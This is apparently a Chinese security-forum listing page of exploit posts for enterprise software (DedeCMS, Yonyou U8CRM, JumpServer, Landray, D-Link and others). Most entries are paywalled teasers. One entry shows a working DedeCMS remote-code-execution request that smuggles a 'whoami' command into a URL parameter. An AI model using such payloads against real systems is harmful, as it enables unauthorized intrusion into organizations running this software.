秃兔安全_最新发布

DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞

GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...

秃兔6个月前

05315

【通用】用友U8CRM biztype.php sql注入漏洞

fofa 语法yakit插件uuidpocyaml 已验证

付费阅读500 POC # poc

dreamer2922个月前

05210

广联达-Linkworks-GetAllData接口存在未授权访问

POC 2024你懂的

秃兔6个月前

05211

【通用】万能门店小程序doPageGuiz 存在sql注入漏洞

fofa语句yakit插件uuidpocyaml 已验证

付费阅读500 POC # poc

dreamer2922个月前

0527

金和OA_jc6_ntko-upload任意文件上传漏洞

POC 2024你懂的

秃兔6个月前

0526

山石网科云鉴存在前台任意命令执行漏洞

import requests”’HSVD-2023-0008”’def setSystemTimeAction(newcsrf,headers): 登录可见余下内容

POC 2024你懂的

秃兔6个月前

05215

【通用】扁鹊飞救智能急救与质控系统 CreateJKDA xxe

fofa语句yakit 插件 uuidpocyaml已验证

付费阅读500 POC # poc

dreamer2928天前

0527

蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入

POC 2024你懂的

秃兔6个月前

05215

JumpServer(CVE-2024-29202)Jinin2模板注入漏洞

POC 2024你懂的

秃兔6个月前

05213

【通用】D-link 产品任意文件读取

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 POC # poc

dreamer29219天前

05112

上一页 1…40 414243 44…52 下一页跳转

攻防演练 & 红蓝对抗 & 其他文库